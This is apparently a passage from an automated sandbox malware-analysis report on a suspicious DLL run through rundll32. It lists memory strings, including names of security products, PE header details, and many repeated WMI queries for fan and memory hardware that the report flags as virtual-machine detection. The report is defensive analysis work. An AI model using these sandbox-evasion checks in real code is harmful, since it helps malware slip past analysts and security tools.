    Source: Binary string: Kernel.Appcore.pdb source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ole32.pdbEXErorData source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: CLBCatQ.pdbnationcanner source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: JiangminAVandFWves.pdb"} source: rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163820855.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164109190.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: wbemcomn.pdbentSupported| source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ucrtbase.pdblogy source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Amsi.pdb source: rundll32.exe, 0000000D.00000003.2561337202.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: imm32.pdbexedgeSupport^ source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rundll32.pdb source: rundll32.exe, 0000000D.00000002.3521988705.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012096904.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640548536.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561249504.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237777818.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: SpywareDoctorox.pdb"},{"Bs source: rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: profapi.pdbeionionport: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: msvcrt.pdbEedon source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ile":"kernelbase.pdb source: rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2639067578.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: fastprox.pdbcurityTools source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: sideload.pdbM Win32_Fan: source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: rasadhlp.pdbcurityToolsR source: rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmp
    Source: 8N8j6QojHn.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: 8N8j6QojHn.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: 8N8j6QojHn.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: 8N8j6QojHn.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: 8N8j6QojHn.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: 8N8j6QojHn.dllStatic PE information: real checksum: 0x37a4bb should be: 0x381d51
    Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FFD943A3C31 push 314C2960h; ret 6_2_00007FFD943A3C36
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Yara detected AntiVM3
    Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORYSTR
    Queries BIOS fan information (via WMI, Win32_Fan, often done to detect virtual machines)
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Fan
    Queries memory information (via WMI often done to detect virtual machines)
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM CIM_Memory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_SMBIOSMemory
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryArray
    Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_MemoryDevice
